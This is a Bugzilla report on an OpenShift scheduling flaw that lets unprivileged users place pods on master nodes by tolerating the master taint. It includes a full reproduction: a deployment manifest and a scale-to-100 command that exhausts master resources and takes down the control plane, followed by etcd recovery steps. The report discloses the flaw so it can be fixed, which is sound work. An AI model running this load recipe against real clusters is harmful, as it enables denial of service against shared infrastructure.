Bug 1956497
| Summary: | Non-OpenShift pods are running on master nodes even though the `.spec.mastersSchedulable` field has value `false`. | | |
|---|---|---|---|
| Product: | OpenShift Container Platform | Reporter: | arajapa |
| Component: | kube-scheduler | Assignee: | Jan Chaloupka <jchaloup> |
| Status: | CLOSED DEFERRED | QA Contact: | RamaKasturi <knarra> |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | 4.5 | CC: | akaris, aos-bugs, bhershbe, ealcaniz, gdiotte, jchaloup, mfojtik |
| Target Milestone: | --- | | |
| Target Release: | --- | | |
| Hardware: | x86_64 | | |
| OS: | Linux | | |
| URL: | https://gss--c.visualforce.com/apex/Case_View?id=5002K00000uELdKQAW | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | If docs needed, set a value |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2021-05-17 08:36:10 UTC | Type: | Bug |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
Description
arajapa
2021-05-03 19:27:38 UTC
I was unable to link the bug to the case in SF, Case # is 02912203

From https://docs.openshift.com/container-platform/4.5/nodes/nodes/nodes-nodes-working.html#nodes-nodes-working-master-schedulable_nodes-nodes-working:

```
You can configure master nodes to be schedulable, meaning that new pods are allowed for placement on the master nodes. By default, master nodes are not schedulable.
...
You can allow or disallow master nodes to be schedulable by configuring the mastersSchedulable field.
```

Some history: In the past it was enough to set node.Spec.Unschedulable to decide whether a node is schedulable or not. This functionality was deprecated in 1.13 [1] and replaced by setting the node.kubernetes.io/unschedulable taint [2]. The kube-scheduler still reads node.Spec.Unschedulable to decide if a node is feasible for scheduling. However, if a pod tolerates the taint, node.Spec.Unschedulable has no effect. When a pod tolerating the taint is created, the kubelet does not see anything wrong with it and simply runs the pod, even on the master nodes.

It is the machine-config-operator that consumes the mastersSchedulable field and, based on its value, either taints every master node with the following taint:

    Key: node-role.kubernetes.io/master
    Effect: NoSchedule

or removes it. Then, either the pod tolerates the taint (and is scheduled to a master node) or it does not.

Also, given that a pod's nodeName can be set explicitly, this issue is not about the kube-scheduler but more about allowing a pod to tolerate any taint. Also, the kubelet has no say in deciding whether a pod that tolerates the taint is supposed to run on its node. So this needs to be decided before a pod is created/updated, i.e. through admission plugins. The question is what criteria decide whether a given pod is allowed to tolerate all taints (or specifically the node-role.kubernetes.io/master:NoSchedule one).

[1] https://github.com/kubernetes/kubernetes/blob/master/pkg/scheduler/framework/plugins/nodeunschedulable/node_unschedulable.go#L69-L72
[2] https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/#taint-based-evictions

Are the pods that got scheduled to master nodes (despite mastersSchedulable set to false) created by an admin? Or were they created by a user? If the former is true, we can update our documentation and provide a warning. If it's the latter case, I suggest opening an RFE where we can discuss the next steps to resolve this issue.
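(Editor's note, not part of the original report.) For reference, this is roughly what the two objects discussed above look like on an OpenShift 4.x cluster; the field names follow the config.openshift.io/v1 Scheduler API and should be checked against the cluster version at hand:

~~~
# Cluster-wide scheduler configuration; mastersSchedulable defaults to false.
apiVersion: config.openshift.io/v1
kind: Scheduler
metadata:
  name: cluster
spec:
  mastersSchedulable: false
~~~

While mastersSchedulable is false, each master node is expected to carry the NoSchedule taint shown above, which can be checked with something like:

~~~
oc get schedulers.config.openshift.io cluster -o jsonpath='{.spec.mastersSchedulable}'
oc get nodes -l node-role.kubernetes.io/master \
  -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.taints}{"\n"}{end}'
~~~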
In upstream kubernetes, there is nothing that stops a non-admin user from creating any toleration for any taint - at least according to the doc: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/ It seems to be exactly the same in OpenShift. Here's my test with 4.6.23:

Creating an unprivileged user and logging in with that user:

~~~
[root@openshift-jumpserver-0 ~]# export KUBECONFIG=/root/openshift-install/auth/kubeconfig
[root@openshift-jumpserver-0 ~]# oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.6.23    True        False         32d     Cluster version is 4.6.23
[root@openshift-jumpserver-0 ~]# htpasswd -c -B -b users.htpasswd user1 MyPassword!
Adding password for user user1
[root@openshift-jumpserver-0 ~]# oc create secret generic htpass-secret --from-file=htpasswd=users.htpasswd -n openshift-config
secret/htpass-secret created
[root@openshift-jumpserver-0 ~]# cat <<'EOF' | oc apply -f -
apiVersion: config.openshift.io/v1
kind: OAuth
metadata:
  name: cluster
spec:
  identityProviders:
  - name: my_htpasswd_provider
    mappingMethod: claim
    type: HTPasswd
    htpasswd:
      fileData:
        name: htpass-secret
EOF
[root@openshift-jumpserver-0 ~]# oc login -u user1 --password=MyPassword!
Login successful.

You don't have any projects. You can try to create a new project, by running

    oc new-project <projectname>

[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

~~~
oc new-project user1
cat <<'EOF' > pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: fedora-pod
  labels:
    app: fedora-pod
spec:
  containers:
  - name: fedora
    image: fedora
    command:
    - sleep
    - infinity
    imagePullPolicy: IfNotPresent
  tolerations:
  - key: "node-role.kubernetes.io/master"
    operator: "Exists"
    effect: "NoSchedule"
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - "openshift-master-0"
EOF
oc apply -f pod.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
fedora-pod   1/1     Running   0          21s   172.26.0.69   openshift-master-0   <none>           <none>
[root@openshift-jumpserver-0 ~]#
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

So this is upstream:
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185
The last one auto-closed; I'm currently still checking if any progress was made beyond the discussions on the 2 issues.

I created https://issues.redhat.com/browse/RFE-1856 Would that do it?

Do you have any idea for a workaround (I suppose that we cannot control this via SCC?) or do you know if further progress has been made upstream beyond
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185

Shall we close this BZ in favor of the RFE?

Thanks,

Andreas
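(Editor's note, not part of the original report.) Since the comments above point at admission control as the place where such a toleration would have to be rejected, one possible stopgap, assuming a policy engine such as OPA Gatekeeper is installed, would be a constraint that rejects pods tolerating the master taint outside of trusted namespaces. A minimal sketch, with placeholder names:

~~~
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8sdenymastertoleration
spec:
  crd:
    spec:
      names:
        kind: K8sDenyMasterToleration
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8sdenymastertoleration

      # Reject any pod that carries a toleration for the master NoSchedule taint.
      violation[{"msg": msg}] {
        toleration := input.review.object.spec.tolerations[_]
        toleration.key == "node-role.kubernetes.io/master"
        msg := "tolerating node-role.kubernetes.io/master is not allowed in this namespace"
      }
~~~

A matching K8sDenyMasterToleration constraint would then be scoped to user namespaces only (excluding the openshift-* and kube-* namespaces), so that platform pods keep their tolerations. This is a sketch of one possible approach, not something validated in the cluster from this report.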
I updated the RFE with this, but I'll post it here, nevertheless. This might become a high priority issue for our customer, rather quickly. I am testing with virtualized masters, but I imagine that the issue can be reproduced similarly on baremetal machines by simply increasing the load further. If my test is valid, then malicious, unprivileged users can easily generate so much load on any given cluster that the control plane collapses.

As an unprivileged user:

~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

I create the following load-tester where each pod will allocate 1 GB of memory and 1000 ms of CPU time:

~~~
cat <<'EOF' > load.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: load-tester
  labels:
    app: load-tester
spec:
  replicas: 1
  selector:
    matchLabels:
      app: load-tester
  template:
    metadata:
      labels:
        app: load-tester
    spec:
      containers:
      - name: load-tester
        image: quay.io/akaris/hpa-tester:latest
        command:
        - /bin/bash
        - -c
        - "churn 1000 & mallocmb 1024 & sleep infinity"
      tolerations:
      - key: "node-role.kubernetes.io/master"
        operator: "Exists"
        effect: "NoSchedule"
      affinity:
        nodeAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            nodeSelectorTerms:
            - matchExpressions:
              - key: node-role.kubernetes.io/master
                operator: In
                values:
                - ""
EOF
oc apply -f load.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME                           READY   STATUS    RESTARTS   AGE   IP             NODE                 NOMINATED NODE   READINESS GATES
fedora-pod                     1/1     Running   0          18h   172.26.0.69    openshift-master-0   <none>           <none>
load-tester-7f85bc7d49-crgmn   1/1     Running   0          11s   172.24.0.120   openshift-master-1   <none>           <none>
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc scale --replicas=100 deployment load-tester
deployment.apps/load-tester scaled
~~~

That will spawn 100 pods of the same kind (each one using a full CPU and trying to allocate 1 GB, so roughly 33 of these pods per master). And this will create gigantic loads on the masters:

~~~
top - 08:43:07 up 33 days, 14:21,  1 user,  load average: 350.09, 153.61, 59.21
Tasks: 639 total,  38 running, 598 sleeping,   0 stopped,   3 zombie
%Cpu(s): 51.4 us, 41.8 sy,  0.0 ni,  0.0 id,  2.3 wa,  2.6 hi,  1.9 si,  0.0 st
MiB Mem :  16034.0 total,    149.1 free,  14971.0 used,    913.8 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.    634.4 avail Mem

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
3208490 root      20   0 1931228 965940  15976 S 106.5   5.9 112:59.46 kube-apiserver
   5994 root      20   0 9066628 446848      0 S  83.9   2.7   2993:04 etcd
   2647 root      20   0 6455880 207508      0 S  22.6   1.3   5569:50 kubelet
[root@openshift-master-1 ~]#
~~~

And the control plane will become unusable:

~~~
[root@openshift-jumpserver-0 ~]# time oc whoami
Error from server (InternalError): an error on the server ("") has prevented the request from succeeding (get users.user.openshift.io ~)

real	0m13.243s
user	0m0.171s
sys	0m0.041s
[root@openshift-jumpserver-0 ~]# time oc get pods
Unable to connect to the server: net/http: TLS handshake timeout

real	0m12.181s
user	0m0.198s
sys	0m0.030s
~~~

The master nodes are super unresponsive due to the increased load and the OOM situation, and eventually the kubernetes control plane will not even answer:

~~~
[root@openshift-jumpserver-0 ~]# oc get pods
The connection to the server api.ipi-cluster.example.com:6443 was refused - did you specify the right host or port?
[root@openshift-jumpserver-0 ~]#
~~~

In order to recover, I had to go to my master nodes and run:

~~~
sudo -i
systemctl stop kubelet ; crictl ps | grep load-tester | awk '{print $1}' | while read l ; do crictl stop $l ; done
~~~

The problem is that my SSH sessions were super unstable, too. I think at some point, the OOM killer killed my session. On another node, it literally took minutes to log in and I had to reboot it. Stopping the containers also took a long time. After I stopped kubelet and removed all load-tester pods, I had to manually delete the deployment and all associated pods from etcd.
On one of the masters, I ran:

~~~
crictl ps | grep etcdctl
crictl exec 28117d1ac36c4 etcdctl del /kubernetes.io/deployments/user1/load-tester
crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/load | while read l ; do if [ "$l" != "" ]; then crictl exec 28117d1ac36c4 etcdctl del $l ; fi; done
~~~

After the cleanup, I made sure that all keys for the load-tester deployment were gone:

~~~
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/
/kubernetes.io/pods/user1/fedora-pod

[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/deployments/user1/
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/replicasets/user1/
[root@openshift-master-0 ~]#
~~~

And then, I could restart kubelet on all masters and the cluster finally recovered:

~~~
systemctl restart kubelet
~~~

- Andreas

Thanks Andreas for filing the RFE. Given the potential severity of the issue, let's keep the BZ open for now.
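(Editor's note, not part of the original report.) For anyone hitting this bug, a quick way for a cluster admin to audit whether user workloads already tolerate the master taint is to filter the pod list; this assumes jq is available and simply excludes the openshift-* and kube-* namespaces:

~~~
# List namespace/name of all pods that tolerate node-role.kubernetes.io/master,
# ignoring platform namespaces so only user workloads remain.
oc get pods --all-namespaces -o json \
  | jq -r '.items[]
      | select(any(.spec.tolerations[]?; .key == "node-role.kubernetes.io/master"))
      | select(.metadata.namespace | test("^(openshift-|kube-)") | not)
      | .metadata.namespace + "/" + .metadata.name'
~~~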